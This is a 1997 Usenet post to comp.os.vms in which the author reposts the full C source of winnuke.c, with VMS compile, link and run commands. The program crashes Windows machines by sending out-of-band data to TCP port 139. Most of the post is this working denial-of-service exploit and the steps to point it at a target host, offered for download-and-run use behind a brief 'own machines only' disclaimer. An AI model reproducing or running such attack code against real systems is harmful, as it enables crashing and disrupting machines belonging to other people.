Article 169874 of comp.os.vms:
Alan Greig wrote (duplicated code section when I cut and pasted
originally
- here's what it should have been)

> 
> Like a tea tray in the sky... wrote:
> 
> > When reality hits, rather than go back to a tried and proven platform that has
> 
> I think reality may have hit home quite hard since the release of the
> winnuke program on the net a few days ago. For those who haven't yet
> heard it's a few lines of C which will allow you to crash any Windows
> machine running an IP stack from anywhere on the Internet. It's really
> quite spectacular. I downloaded and compiled it under VMS and it crashes
> WIndows NT machines every time. Microsoft has rushed out a patch
> of course but considering the simplicity of winnuke.c (basically it
> just sets the OUT-OF-BAND flag and transmits any old data to port 139) I
> can't help wondering how many other fatal bugs lurk in Microsoft's IP
> stack
> alone.
> 
> As anyone can find it with a web search for winnuke.c I don't have any
> problems with posting a version which will run under VMS here. I DO NOT
> advise anyone to run this other than to check the vulnerabilty of
> machines
> under their own control. I want to stress that I have no connection with
> the authoriship of this program. I just found it with an altavista
> search.
> 
> $ cc/prefix=all winnuke
> $ link winnuke
> $ winnuke :== $disk:[dir]winnuke
> $ winnuke host.mydomain
> 
> /* winnuke.c - (05/07/97)  By _eci  */
> /* Tested on Linux 2.0.30, OpenVMS 6.2, SunOS 5.5.1, and BSDI 2.1 */
> 
> #include <stdio.h>
> #include <string.h>
> #include <netdb.h>
> #include <netinet/in.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <unistd.h>
> 
> #define dport 139  /* Attack port: 139 is what we want */
> 
> int x, s;
> char *str = "Bye";  /* Makes no diff */
> struct sockaddr_in addr, spoofedaddr;
> struct hostent *host;
> 
> int open_sock(int sock, char *server, int port) {
>      struct sockaddr_in blah;
>      struct hostent *he;
>      memset((char *)&blah,'0',sizeof(blah));
>      blah.sin_family=AF_INET;
>      blah.sin_addr.s_addr=inet_addr(server);
>      blah.sin_port=htons(port);
> 
>     if ((he = gethostbyname(server)) != NULL) {
>         memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length );
>     }
>     else {
>          if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
>            perror("gethostbyname()");
>            return(-3);
>          }
>     }
> 
>         if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
>              perror("connect()");
>              close(sock);
>              return(-4);
>         }
>         printf("Connected to [%s:%d].\n",server,port);
>         return;
> }
> 
>     main(int argc, char *argv[]) {
> 
>      if (argc != 2) {
>        printf("Usage: %s <target>\n",argv[0]);
>        exit(0);
>      }
> 
>      if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
>         perror("socket()");
>         exit(-1);
>      }
> 
>      open_sock(s,argv[1],dport);
> 
>      printf("Sending crash... ");
>        send(s,str,strlen(str),MSG_OOB);
>        sleep(2);
>      printf("Done!\n");
>      close(s);
> }
> 
> --
> Alan Greig                           Tel: (01382) 308802
> University of Abertay Dundee       Email: A.Greig@tay.ac.uk
>    ** Never underestimate the power of human stupidity **

--
Alan Greig                           Tel: (01382) 308802
University of Abertay Dundee       Email: A.Greig@tay.ac.uk
   ** Never underestimate the power of human stupidity **